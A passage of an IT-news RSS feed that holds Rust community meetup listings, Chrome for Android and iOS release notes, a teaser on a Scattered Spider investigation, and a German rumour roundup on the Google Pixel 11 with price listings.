<li>2026-07-21 | Virtual (Washington, DC, US) | <a href="https://www.meetup.com/rustdc">Rust DC</a></li>
<li><a href="https://www.meetup.com/rustdc/events/315279653/"><strong>Mid-month Rustful</strong></a></li>
<li>2026-07-22 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a></li>
<li><a href="https://luma.com/hd8mlw56"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
<li>2026-07-28 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a></li>
<li><a href="https://www.meetup.com/dallasrust/events/310254777/"><strong>Fourth Tuesday</strong></a></li>
<li>2026-07-29 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a></li>
<li><a href="https://luma.com/uo5ek1f4"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
<li>2026-07-30 | Virtual (Berlin, DE) | <a href="https://www.meetup.com/rust-berlin/events/">Rust Berlin</a></li>
<li><a href="https://www.meetup.com/rust-berlin/events/312045928/"><strong>Rust Hack and Learn</strong></a></li>
<li>2026-08-02 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust/events/">Dallas Rust User Meetup</a></li>
<li><a href="https://www.meetup.com/dallasrust/events/314095294/"><strong>Rust Deep Learning: First Sunday</strong></a></li>
<li>2026-08-04 | Virtual (London, GB) | <a href="https://www.meetup.com/women-in-rust/events/">Women in Rust</a></li>
<li><a href="https://www.meetup.com/women-in-rust/events/315213885/"><strong>👋 Community Catch Up</strong></a></li>
<li>2026-07-29 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a></li>
<li><a href="https://luma.com/ii2jrwva"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
<li>2026-08-05 | Virtual (Indianapolis, IN, US) | <a href="https://www.meetup.com/indyrs/events/">Indy Rust</a></li>
<li><a href="https://www.meetup.com/indyrs/events/315210367/"><strong>Indy.rs - with Social Distancing</strong></a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#asia">Asia</a></h5>
<ul>
<li>2026-07-18 | Bangalore, IN | <a href="https://hasgeek.com/rustbangalore">Rust Bangalore</a></li>
<li><a href="https://hasgeek.com/rustbangalore/july-2026-rustacean-meetup/"><strong>July 2026 Rustacean Meetup</strong></a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#africa">Africa:</a></h5>
<ul>
<li>2026-07-14 | Johannesburg, ZA | <a href="https://www.meetup.com/johannesburg-rust-meetup/events/">Johannesburg Rust Meetup</a></li>
<li><a href="https://www.meetup.com/johannesburg-rust-meetup/events/315573758/"><strong>Debugging a production grade Open Source Rust crate</strong></a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#europe">Europe</a></h5>
<ul>
<li>2026-07-08 | Dublin, IE | <a href="https://www.meetup.com/rust-dublin">Rust Dublin</a></li>
<li><a href="https://www.meetup.com/rust-dublin/events/315150327/"><strong>Join us live and INPERSON for Rust 262</strong></a></li>
<li>2026-07-09 | Berlin, DE | <a href="https://www.meetup.com/rust-berlin/events/">Rust Berlin</a></li>
<li><a href="https://www.meetup.com/rust-berlin/events/315585121/"><strong>Rust Berlin on location 🏳️‍🌈 - Edition 015</strong></a></li>
<li>2026-07-09 | Frankfurt, DE | <a href="https://www.meetup.com/rust-rhein-main/events/">Rust Rhein-Main</a></li>
<li><a href="https://www.meetup.com/rust-rhein-main/events/315366165/"><strong>Building Cross Platform Applications with Ply</strong></a></li>
<li>2026-07-09 | Switzerland, CH | <a href="https://www.posttenebraslab.ch/wiki/events/start">PostTenebrasLab</a></li>
<li><a href="https://www.posttenebraslab.ch/wiki/events/monthly_meeting/rust_meetup"><strong>Rust Meetup Geneva</strong></a></li>
<li>2026-07-15 | Dortmund, DE | <a href="https://www.meetup.com/rust-dortmund/events/">Rust Dortmund</a></li>
<li><a href="https://www.meetup.com/rust-dortmund/events/315496876/"><strong>Teach and Hack at Projektspeicher</strong></a></li>
<li>2026-07-21 | Leipzig, DE | <a href="https://www.meetup.com/rust-modern-systems-programming-in-leipzig">Rust - Modern Systems Programming in Leipzig</a></li>
<li><a href="https://www.meetup.com/rust-modern-systems-programming-in-leipzig/events/313816470/"><strong>Supercharge Rust funcs with implicit arguments and context-generic programming</strong></a></li>
<li>2026-07-23 | Berlin, DE | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a></li>
<li><a href="https://www.meetup.com/rust-berlin/events/315484101/"><strong>Rust Berlin Talks: The next generation</strong></a></li>
<li>2026-07-23 | London, UK | <a href="https://www.meetup.com/london-rust-project-group">London Rust Project Group</a></li>
<li><a href="https://www.meetup.com/london-rust-project-group/events/315366453/"><strong>Rama modular service framework for Rust</strong></a></li>
<li>2026-07-23 | Paris, FR | <a href="https://www.meetup.com/rust-paris">Rust Paris</a></li>
<li><a href="https://www.meetup.com/rust-paris/events/315309633/"><strong>Rust meetup #87</strong></a></li>
<li>2026-07-30 | Manchester, GB | <a href="https://www.meetup.com/rust-manchester/events/">Rust Manchester</a></li>
<li><a href="https://www.meetup.com/rust-manchester/events/315037685/"><strong>Rust Manchester July Code Night</strong></a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#north-america">North America</a></h5>
<ul>
<li>2026-07-09 | Lehi, UT, US | <a href="https://www.meetup.com/utah-rust">Utah Rust</a></li>
<li><a href="https://www.meetup.com/utah-rust/events/314696647/"><strong>Utah Rust July Meetup</strong></a></li>
<li>2026-07-09 | Mountain View, CA, US | <a href="https://www.meetup.com/hackerdojo/events/">Hacker Dojo</a></li>
<li><a href="https://www.meetup.com/hackerdojo/events/315338107/"><strong>RUST MEETUP at HACKER DOJO</strong></a></li>
<li>2026-07-11 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust">Boston Rust Meetup</a></li>
<li><a href="https://www.meetup.com/bostonrust/events/315225865/"><strong>MIT Rust Lunch, July 11</strong></a></li>
<li>2026-07-15 | Hybrid (Vancouver, BC, CA) | <a href="https://www.meetup.com/vancouver-rust">Vancouver Rust</a></li>
<li><a href="https://www.meetup.com/vancouver-rust/events/314233743/"><strong>Jiff</strong></a></li>
<li>2026-07-16 | Hybrid (Seattle, WA, US) | <a href="https://www.meetup.com/join-srug">Seattle Rust User Group</a></li>
<li><a href="https://www.meetup.com/seattle-rust-user-group/events/314520812/"><strong>July, 2026 SRUG (Seattle Rust User Group) Meetup</strong></a></li>
<li>2026-07-18 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust">Boston Rust Meetup</a></li>
<li><a href="https://www.meetup.com/bostonrust/events/315225872/"><strong>North End Rust Lunch, July 18</strong></a></li>
<li>2026-07-21 | San Francisco, CA, US | <a href="https://www.meetup.com/san-francisco-rust-study-group">San Francisco Rust Study Group</a></li>
<li><a href="https://www.meetup.com/san-francisco-rust-study-group/events/314997214/"><strong>Rust Hacking in Person</strong></a></li>
<li>2026-07-22 | Austin, TX, US | <a href="https://www.meetup.com/rust-atx">Rust ATX</a></li>
<li><a href="https://www.meetup.com/rust-atx/events/xvkdgtyjckbdc/"><strong>Rust Lunch - Fareground</strong></a></li>
<li>2026-07-22 | Los Angeles, CA, US | <a href="https://www.meetup.com/rust-los-angeles">Rust Los Angeles</a></li>
<li><a href="https://www.meetup.com/rust-los-angeles/events/315376271/"><strong>Rust LA: Rust in Distributed Systems with Flight Science!</strong></a></li>
<li>2026-07-25 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust/events/">Boston Rust Meetup</a></li>
<li><a href="https://www.meetup.com/bostonrust/events/315582650/"><strong>Porter Square Rust Lunch, July 25</strong></a></li>
<li>2026-07-25 | Brooklyn, NY, US | <a href="https://flowercomputer.com/">Flower</a></li>
<li><a href="https://partiful.com/e/Vq9fyDNCMSO7ia4ulK5b"><strong>BOG-A-THON 2</strong></a></li>
<li>2026-07-30 | Atlanta, GA, US | <a href="https://www.meetup.com/rust-atl/events/">Rust Atlanta</a></li>
<li><a href="https://www.meetup.com/rust-atl/events/313539329/"><strong>Rust-Atl</strong></a></li>
<li>2026-08-01 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust/events/">Boston Rust Meetup</a></li>
<li><a href="https://www.meetup.com/bostonrust/events/315582653/"><strong>Chinatown Rust Lunch, Aug 1</strong></a></li>
<li>2026-08-04 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust/events/">Boston Rust Meetup</a></li>
<li><a href="https://www.meetup.com/bostonrust/events/314660176/"><strong>Evening Boston Rust Meetup at Red Hat, Aug 4</strong></a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#oceania">Oceania</a></h5>
<ul>
<li>2026-07-09 | Brisbane City, QL, AU | <a href="https://www.meetup.com/rust-brisbane/events/">Rust Brisbane</a></li>
<li><a href="https://www.meetup.com/rust-brisbane/events/315563251/"><strong>Rust Brisbane • July 2026</strong></a></li>
<li>2026-07-21 | Barton, AU | <a href="https://www.meetup.com/rust-canberra">Canberra Rust User Group</a></li>
<li><a href="https://www.meetup.com/rust-canberra/events/315307280/"><strong>July Meetup</strong></a></li>
<li>2026-07-23 | Perth, AU | <a href="https://www.meetup.com/perth-rust-meetup-group">Rust Perth Meetup Group</a></li>
<li><a href="https://www.meetup.com/perth-rust-meetup-group/events/315451138/"><strong>Rust Perth: July Meetup!</strong></a></li>
<li>2026-07-30 | Melbourne, AU | <a href="https://www.meetup.com/rust-melbourne/events/">Rust Melbourne</a></li>
<li><a href="https://www.meetup.com/rust-melbourne/events/315039480/"><strong>Rust Melbourne July 2026</strong></a></li>
</ul>
<p>If you are running a Rust event please add it to the <a href="https://www.google.com/calendar/embed?src=apd9vmbc22egenmtu5l6c5jbfc%40group.calendar.google.com">calendar</a> to get
it mentioned here. Please remember to add a link to the event too.
Email the <a href="mailto:community-team@rust-lang.org">Rust Community Team</a> for access.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#jobs">Jobs</a></h4>
<p>Please see the latest <a href="https://www.reddit.com/r/rust/comments/1ttbtf5/official_rrust_whos_hiring_thread_for_jobseekers/">Who's Hiring thread on r/rust</a></p>
<h3><a class="toclink" href="https://this-week-in-rust.org/atom.xml#quote-of-the-week">Quote of the Week</a></h3>
<blockquote>
<p>if a ptr is dereferenced in a forest and nobody hears it, is it sound?</p>
</blockquote>
<p>– <a href="https://users.rust-lang.org/t/does-the-indirection-of-a-pointer-immediately-create-a-reference/141071/10">Kornel on rust-users</a></p>
<p>Thanks to <a href="https://users.rust-lang.org/t/twir-quote-of-the-week/328/1785">Cerber-Ursi</a> for the suggestion!</p>
<p><a href="https://users.rust-lang.org/t/twir-quote-of-the-week/328">Please submit quotes and vote for next week!</a></p>
<p>This Week in Rust is edited by:</p>
<ul>
<li><a href="https://github.com/nellshamrell">nellshamrell</a></li>
<li><a href="https://github.com/llogiq">llogiq</a></li>
<li><a href="https://github.com/ericseppanen">ericseppanen</a></li>
<li><a href="https://github.com/extrawurst">extrawurst</a></li>
<li><a href="https://github.com/U007D">U007D</a></li>
<li><a href="https://github.com/mariannegoldin">mariannegoldin</a></li>
<li><a href="https://github.com/bdillo">bdillo</a></li>
<li><a href="https://github.com/opeolluwa">opeolluwa</a></li>
<li><a href="https://github.com/bnchi">bnchi</a></li>
<li><a href="https://github.com/KannanPalani57">KannanPalani57</a></li>
<li><a href="https://github.com/tzilist">tzilist</a></li>
</ul>
<p><em>Email list hosting is sponsored by <a href="https://foundation.rust-lang.org/">The Rust Foundation</a></em></p>
<p><small><a href="https://www.reddit.com/r/rust/comments/1ureq0r/this_week_in_rust_659/">Discuss on r/rust</a></small></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome for Android Update]]></title>
<description><![CDATA[  Hi, everyone! We've just released Chrome 150 (150.0.7871.114) for Android. It'll become available on Google Play over the next few days. This release includes stability and performance improvements. You can see a full list of the changes in the Git log. If you find a new issue, please let us kn...]]></description>
<link>https://tsecurity.de/de/3655664/it-security-nachrichten/chrome-for-android-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655664/it-security-nachrichten/chrome-for-android-update/</guid>
<pubDate>Thu, 09 Jul 2026 02:37:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>  Hi, everyone! We've just released <b>Chrome 150 (150.0.7871.114)</b> for Android. It'll become <a href="https://play.google.com/store/apps/details?id=com.android.chrome">available on Google Play</a> over the next few days. </p><p>This release includes stability and performance improvements. You can see a full list of the changes in the <a href="https://chromium.googlesource.com/chromium/src/+log/150.0.7871.63..150.0.7871.114?pretty=fuller&amp;n=10000">Git log</a>. If you find a new issue, please let us know by <a href="https://code.google.com/p/chromium/issues/entry?template=Android%20Issue">filing a bug</a>.</p><div><br></div><div>Android releases contain the same security fixes as their corresponding<a href="https://chromereleases.googleblog.com/2026/07/stable-channel-update-for-desktop_01162222768.html"> Desktop releases</a> (Windows &amp; Mac: 150.0.7871.114/115, Linux: 150.0.7871.114) unless otherwise noted.</div><div><div><br></div><div><div>Krishna Govind</div><div><a href="https://www.google.com/chrome/">Google Chrome</a></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome Stable for iOS Update]]></title>
<description><![CDATA[Hi everyone! We've just released Chrome Stable 150 (150.0.7871.113) for iOS; it'll become available on App Store in the next few hours.This release includes stability and performance improvements. You can see a full list of the changes in the Git log. If you find a new issue, please let us know b...]]></description>
<link>https://tsecurity.de/de/3655114/it-security-nachrichten/chrome-stable-for-ios-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655114/it-security-nachrichten/chrome-stable-for-ios-update/</guid>
<pubDate>Wed, 08 Jul 2026 20:07:43 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hi everyone! We've just released Chrome Stable 150 (150.0.7871.113) for iOS; it'll become available on App Store in the next few hours.</p><p>This release includes stability and performance improvements. You can see a full list of the changes in the <a href="https://chromium.googlesource.com/chromium/src/+log/150.0.7871.51..150.0.7871.113?pretty=fuller&amp;n=10000">Git log</a>. If you find a new issue, please let us know by <a href="https://code.google.com/p/chromium/issues/entry?template=iOS%20Issue">filing a bug</a>.</p><p>Chrome Release Team<br><a href="https://www.google.com/chrome"></a><a href="https://www.google.com/chrome">Google Chrome</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Scattered Spider, Windows Device ID Case and Incident Response Lessons]]></title>
<description><![CDATA[Recently unsealed US court documents reveal that Microsoft allegedly helped investigators identify an alleged member of the Scattered Spider cybercrime group by using a unique Windows Device Identifier (GDID). The case demonstrates how modern investigations rely on digital evidence from multiple ...]]></description>
<link>https://tsecurity.de/de/3654979/it-security-nachrichten/scattered-spider-windows-device-id-case-and-incident-response-lessons/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654979/it-security-nachrichten/scattered-spider-windows-device-id-case-and-incident-response-lessons/</guid>
<pubDate>Wed, 08 Jul 2026 19:23:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="hs-featured-image-wrapper"> 
 <a href="https://www.cm-alliance.com/cybersecurity-blog/scattered-spider-windows-device-id-case-and-incident-response-lessons" title="" class="hs-featured-image-link"> <img src="https://www.cm-alliance.com/hubfs/Cybersecurity%20Analyst%20in%20Datafilled%20Room%20(1).webp" alt="Incident Response and Evidence Analyst" class="hs-featured-image"> </a> 
</div> 
<p><span>Recently unsealed US court documents reveal that Microsoft allegedly helped investigators identify an alleged member of the Scattered Spider cybercrime group by using a unique Windows Device Identifier (GDID). The case demonstrates how modern investigations rely on digital evidence from multiple sources rather than a single technical artefact. It also highlights why organisations need mature <a href="https://www.cm-alliance.com/cyber-incident-response-plan-template">incident response plans</a>, forensic readiness and well-tested <a href="https://www.cm-alliance.com/cyber-incident-response-playbooks-training">incident  response playbooks</a> to investigate cyber incidents effectively.</span><br></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google Pixel 11: Die wichtigsten Leaks und Gerüchte]]></title>
<description><![CDATA[Das Pixel 11 gehört zweifellos zu den am meisten erwarteten Android-Smartphones des Jahres 2026 – und das aus gutem Grund. Auch wenn man argumentieren könnte, dass es sich nicht um eine so umfassende Neugestaltung handelte wie bei den jüngsten iPhone-17-Modellen von Apple, umfasst die Pixel-10-Re...]]></description>
<link>https://tsecurity.de/de/3654494/it-nachrichten/google-pixel-11-die-wichtigsten-leaks-und-geruechte/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654494/it-nachrichten/google-pixel-11-die-wichtigsten-leaks-und-geruechte/</guid>
<pubDate>Wed, 08 Jul 2026 15:47:40 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Das Pixel 11 gehört zweifellos zu den am meisten erwarteten Android-Smartphones des Jahres 2026 – und das aus gutem Grund. Auch wenn man argumentieren könnte, dass es sich nicht um eine so umfassende Neugestaltung handelte wie bei den jüngsten <a href="https://www.macwelt.de/article/2915599/test-iphone-17.html" target="_blank" rel="noreferrer noopener">iPhone-17-Modellen von Apple</a>, umfasst die <a href="https://www.pcwelt.de/article/2921090/google-pixel-10-test.html" target="_blank" rel="noreferrer noopener">Pixel-10-Reihe</a> dennoch eine Reihe herausragender Geräte, die viele gerne als ihr Alltagsgerät nutzen.</p>



<p>Der verbesserte Tensor-G5-Chipsatz ermöglichte es, dass mehr von Googles hauseigenen KI-Funktionen in die integrierte Software Einzug hielten. Die Einführung von Pixelsnap bedeutete, dass Android-Fans, die schon lange neidisch auf Apples Magsafe-Technologie waren, endlich alle Vorteile genießen konnten, die eine Qi2-Magnetverbindung mit sich bringt.</p>



<p>Diese Verbesserungen ergänzen die üblichen Vorzüge, die wir an Pixel-Smartphones schätzen – nämlich die Art und Weise, wie ihre Kameras Hauttöne in Bildern präzise wiedergeben, sowie die wunderbar übersichtliche Gestaltung von Stock-Android. Genau aus diesem Grund finden sich Pixel-Smartphones regelmäßig in unseren Übersichten zu den <a href="https://www.pcwelt.de/article/1924183/das-beste-smartphone-im-test.html" target="_blank" rel="noreferrer noopener">besten Smartphones</a> wieder.</p>



<p>Vor diesem Hintergrund sind wir gespannt, in welche Richtung Google mit der Pixel-11-Reihe als Nächstes gehen wird – insbesondere da sich der Wettbewerb durch aktuelle Android-Spitzenmodelle wie das <a href="https://www.pcwelt.de/article/2972780/oneplus-15-test-handy-flaggschiff.html" target="_blank" rel="noreferrer noopener">OnePlus 15</a> und das <a href="https://www.pcwelt.de/article/3041397/honor-magic-8-pro-test.html" target="_blank" rel="noreferrer noopener">Honor Magic 8 Pro</a> weiter verschärft, ganz zu schweigen vom <a href="https://www.techadvisor.com/article/2950432/oppo-find-x9-pro-review.html">Oppo Fin</a><a href="https://www.pcwelt.de/article/2967222/oppo-find-x9-pro-test.html" target="_blank" rel="noreferrer noopener">d</a><a href="https://www.techadvisor.com/article/2950432/oppo-find-x9-pro-review.html"> X9 Pro</a>, das in Sachen Smartphone-Fotografie ein absolutes Kraftpaket ist.</p>



<h2 class="wp-block-heading">Neueste Gerüchte zum Pixel 11</h2>



<p>Alle Pixel-11-Modelle könnten eine umfassende Kameraüberarbeitung erfahren: Sowohl das Pixel 11 als auch das 11 Pro Fold sollen mit einem neuen 50-Megapixel-Hauptobjektiv ausgestattet werden, während das Pixel 11 Pro und das 11 Pro XL komplett neue Haupt- und Teleobjektive erhalten werden. Nachdem Gerüchte über eine Face-ID-Alternative <a href="https://www.androidauthority.com/google-pixel-11-face-unlock-3494465/" target="_blank" rel="noreferrer noopener">kursierten</a>, scheint es nun so, als würde diese Funktion auf die Modelle des nächsten Jahres verschoben werden.</p>



<h2 class="wp-block-heading toc">Wann wird das Google Pixel 11 erscheinen?</h2>



<p>Die Google-Pixel-11-Reihe wird voraussichtlich im <strong>August 2026</strong> auf den Markt kommen, wahrscheinlich im Rahmen der jährlichen Sommerveranstaltung von Google. Der offizielle Termin dafür ist der <strong>12. August 2026.</strong></p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4ade1c"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/09/Google-Pixel-9-Pro_review_1.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Google Pixel 9 Pro review 1" class="wp-image-2457624" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Dominik Tomaszewski / Foundry</p></div>



<p><a href="https://www.androidauthority.com/exclusive-pixel-10a-pixel-11-codename-3516163/" target="_blank" rel="noreferrer noopener">Gerüchten</a> zufolge soll die Pixel-11-Serie tatsächlich erneut bis zu vier Geräte umfassen. Sollte Google wie in den letzten Jahren verfahren, wird das Pixel 11 Pro Fold später auf den Markt kommen als die anderen Modelle.</p>



<p>Diese Dokumente bestätigen die Codenamen für die Pixel-Geräte des Jahres 2026, wobei die Pixel-11-Serie Namen mit Bärenbezug trägt, wie „cubs“ für das Standardmodell Pixel 11, „grizzly“ für das Pixel 11 Pro, „kodiak“ für das Pixel 11 Pro XL und „yogi“ für das Pixel 11 Pro Fold.</p>



<p>Früher brachte Google neue Smartphones im Oktober auf den Markt, hat den Termin jedoch bei den letzten beiden Generationen vorverlegt. Zum Vergleich finden Sie hier die Erscheinungsdaten der vorherigen Generationen:</p>



<ul class="wp-block-list">
<li>Google Pixel 10: August 2025</li>



<li>Google Pixel 9: August 2024</li>



<li>Google Pixel 8: Oktober 2023</li>



<li>Google Pixel 7: Oktober 2022</li>



<li>Google Pixel 6: Oktober 2021</li>
</ul>



<p><strong>Aktuell bester Preis: Google Pixel 10 Pro</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  amazon_vendor">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/amazon-logo.svg" alt="Amazon" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>699,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.amazon.de/dp/B0FHL2XPXS?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vars-product-name="Google Pixel 10 Pro" data-vars-product-id="2885443" data-vars-category="Smartphones" data-vars-manufacturer-id="10535" data-vars-manufacturer="Google" data-vars-vendor="billiger,gtin,amazon,mpn,Google" data-vars-po="billiger,gtin,amazon,mpn" data-product="2885443" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.amazon.de/dp/B0FHL2XPXS?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vendor-api="amazon" data-vars-product-price="699,00 €" data-vars-product-vendor="Amazon" aria-label="Deal anschauen bei Amazon für 699,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/4541.png" alt="notebooksbilliger" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>739,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=9mF14ZML3xvvsU1Wdh-mdc5Hd99OQeF7QCRno7tgpQ2EbEokfk-c7DoPHGkcTOvl4p5eUIvJnUoNvPmu_f-_aq8-Wddkw8eC6f6GK1pGX9tj6A-ynv4JBEq13XGgNNj-5WtidlRBfwe&amp;mid=685576676215&amp;id=685576676215&amp;ts=20260708&amp;log=rss" data-vars-product-name="Google Pixel 10 Pro" data-vars-product-id="2885443" data-vars-category="Smartphones" data-vars-manufacturer-id="10535" data-vars-manufacturer="Google" data-vars-vendor="billiger,gtin,amazon,mpn,Google" data-vars-po="billiger,gtin,amazon,mpn" data-product="2885443" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=9mF14ZML3xvvsU1Wdh-mdc5Hd99OQeF7QCRno7tgpQ2EbEokfk-c7DoPHGkcTOvl4p5eUIvJnUoNvPmu_f-_aq8-Wddkw8eC6f6GK1pGX9tj6A-ynv4JBEq13XGgNNj-5WtidlRBfwe&amp;mid=685576676215&amp;id=685576676215&amp;ts=20260708&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="739,00 €" data-vars-product-vendor="notebooksbilliger" aria-label="Deal anschauen bei notebooksbilliger für 739,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/15554.png" alt="Proshop.de" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>749,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=i1S_0nFU02-tiDOfdN0LnJe3tbSWKwr5e1JKjacGdEc6RmIsvl8L8XwpgNs8FzmZYp5eUIvJnUoNvPmu_f-_aqVk-kHwG_HYtp1bPvpt8NnzjRMc48vr-G4U2VorRIJ5LLdD2b4PFgn55AQdrkp4S4&amp;mid=685509711925&amp;id=685509711925&amp;ts=20260708&amp;log=rss" data-vars-product-name="Google Pixel 10 Pro" data-vars-product-id="2885443" data-vars-category="Smartphones" data-vars-manufacturer-id="10535" data-vars-manufacturer="Google" data-vars-vendor="billiger,gtin,amazon,mpn,Google" data-vars-po="billiger,gtin,amazon,mpn" data-product="2885443" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=i1S_0nFU02-tiDOfdN0LnJe3tbSWKwr5e1JKjacGdEc6RmIsvl8L8XwpgNs8FzmZYp5eUIvJnUoNvPmu_f-_aqVk-kHwG_HYtp1bPvpt8NnzjRMc48vr-G4U2VorRIJ5LLdD2b4PFgn55AQdrkp4S4&amp;mid=685509711925&amp;id=685509711925&amp;ts=20260708&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="749,00 €" data-vars-product-vendor="Proshop.de" aria-label="Deal anschauen bei Proshop.de für 749,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/24204.png" alt="coolblue" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>759,95 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=8QPJI2NQy8XtiDOfdN0LnJe3tbSWKwr5QeYu02RyInb6RmIsvl8L8VovW2rD7AzJop5eUIvJnUoNvPmu_f-_aq8-Wddkw8eC6f6GK1pGX9tj6A-ynv4JBEq13XGgNNj-5WtidlRBfwe&amp;mid=685628452345&amp;id=685628452345&amp;ts=20260708&amp;log=rss" data-vars-product-name="Google Pixel 10 Pro" data-vars-product-id="2885443" data-vars-category="Smartphones" data-vars-manufacturer-id="10535" data-vars-manufacturer="Google" data-vars-vendor="billiger,gtin,amazon,mpn,Google" data-vars-po="billiger,gtin,amazon,mpn" data-product="2885443" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=8QPJI2NQy8XtiDOfdN0LnJe3tbSWKwr5QeYu02RyInb6RmIsvl8L8VovW2rD7AzJop5eUIvJnUoNvPmu_f-_aq8-Wddkw8eC6f6GK1pGX9tj6A-ynv4JBEq13XGgNNj-5WtidlRBfwe&amp;mid=685628452345&amp;id=685628452345&amp;ts=20260708&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="759,95 €" data-vars-product-vendor="coolblue" aria-label="Deal anschauen bei coolblue für 759,95 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__hidden-records-wrapper">
									<div class="price-comparison__record  ">
